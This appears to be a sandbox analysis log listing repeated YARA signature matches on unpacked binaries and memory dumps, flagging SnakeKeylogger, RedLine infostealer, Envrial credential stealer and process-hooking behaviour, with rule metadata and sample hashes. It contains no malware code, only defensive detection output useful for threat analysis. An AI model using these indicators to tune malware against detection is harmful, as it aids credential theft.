          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 4.2.brightness.exe.217d67a8.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
